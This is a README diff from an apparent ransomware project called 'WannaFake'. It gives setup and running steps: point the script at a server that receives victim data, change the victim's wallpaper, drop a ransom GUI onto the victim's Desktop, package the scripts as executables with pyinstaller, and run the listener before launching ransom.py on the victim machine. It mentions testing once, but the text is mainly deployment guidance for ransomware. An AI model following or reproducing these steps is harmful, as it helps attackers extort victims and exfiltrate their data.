Lencof/WannaFake/README.md

 ## Setup
-In _ransom.py_ make sure to change `YOUR WALLPAPER BACKGROUND` to an image (link from a web server) you want to use as a wallpaper and also change `IP` to your server IP in which you want the victim data to be sent to
+In _ransom.py_ make sure to change `YOUR WALLPAPER BACKGROUND` to an image (link from a web server) you want to use as a wallpaper and also change `IP` to your server IP in which you want the victim data to be sent to.

+Another thing we need to mention is about the GUI program.
+You have two options, one is to edit the `setup_files` function in `ransom.py` so the function will download the GUI file into the victim's Desktop.
+Or, if you use this program for testing, you can do that by your own (place the GUI file into your victim's Desktop) so the victim can open the GUI and follow the instructions.

+You can also convert the Python files to executable files (look at pyinstaller.txt)
+###### Running the Program
+After you have completed the setup, you need to run the `server.py` which will wait for incoming connections (the victims).
+And then run the `ransom.py` on the victim machine.